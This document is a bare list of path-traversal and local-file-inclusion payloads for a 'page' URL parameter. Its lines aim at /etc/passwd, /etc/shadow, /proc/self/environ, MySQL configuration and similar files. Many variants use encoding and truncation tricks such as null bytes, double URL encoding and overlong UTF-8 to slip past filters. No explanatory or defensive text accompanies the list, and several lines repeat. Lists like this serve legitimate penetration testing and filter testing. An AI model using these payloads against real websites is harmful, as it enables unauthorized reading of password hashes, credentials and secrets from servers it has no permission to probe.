page=../../../../../../etc/passwd
page=../../../../../../etc/issue
page=../../../../../../etc/shadow
page=../../../../../../etc/group
page=../../../../../../etc/hosts
page=../../../../../../etc/motd
page=../../../../../../etc/mysql/my.cnf
page=../../../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../../../proc/self/environ
page=../../../../../../proc/version
page=../../../../../../proc/cmdline
page=../../../../../../etc/issue
page=../../../../../../etc/shadow
page=../../../../../../etc/group
page=../../../../../../etc/hosts
page=../../../../../../etc/motd
page=../../../../../../etc/mysql/my.cnf
page=../../../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../../../proc/self/environ
page=../../../../../../proc/version
page=../../../../../etc/passwd
page=../../../../../etc/issue
page=../../../../../etc/shadow
page=../../../../../etc/group
page=../../../../../etc/hosts
page=../../../../../etc/motd
page=../../../../../etc/mysql/my.cnf
page=../../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../../proc/self/environ
page=../../../../../proc/version
page=../../../../../proc/cmdline
page=../../../../../etc/issue
page=../../../../../etc/shadow
page=../../../../../etc/group
page=../../../../../etc/hosts
page=../../../../../etc/motd
page=../../../../../etc/mysql/my.cnf
page=../../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../../proc/self/environ
page=../../../../../proc/version
page=../../../../etc/passwd
page=../../../../etc/issue
page=../../../../etc/shadow
page=../../../../etc/group
page=../../../../etc/hosts
page=../../../../etc/motd
page=../../../../etc/mysql/my.cnf
page=../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../proc/self/environ
page=../../../../proc/version
page=../../../../proc/cmdline
page=../../../../etc/issue
page=../../../../etc/shadow
page=../../../../etc/group
page=../../../../etc/hosts
page=../../../../etc/motd
page=../../../../etc/mysql/my.cnf
page=../../../../proc/[0-9]*/fd/[0-9]*
page=../../../../proc/self/environ
page=../../../../proc/version
page=....//....//....//etc/passwd
page=....\/....\/....\/etc/passwd
page=%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
page=../../../etc/passwd%00
page=..%252f..%252f..%252fetc%252fpasswd
page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
page=%252e%252e%252fetc%252fpasswd
page=%252e%252e%252fetc%252fpasswd%00
page=utils/scripts/../../../../../etc/passwd
page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
page=a/../../../../../../../../../etc/passwd/././././././././
page=a/../../../../../../../../../etc/passwd/./././././././././
page=a/../../../../../../../../../etc/passwd/././././././././././
page=a/../../../../../../../../../etc/passwd/./././././././././././
page=a/../../../../../../../../../etc/passwd/././././././././././././
page=a/../../../../../../../../../etc/passwd/./././././././././././././
page=a/././././././etc/passwd
page=a/../../../../[ADD MORE]../../../../../etc/passwd
page=....//....//etc/passwd
page=..///////..////..//////etc/passwd
page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd http://vulnerable-site.com/index.php?page=/var/www/../../etc/passwd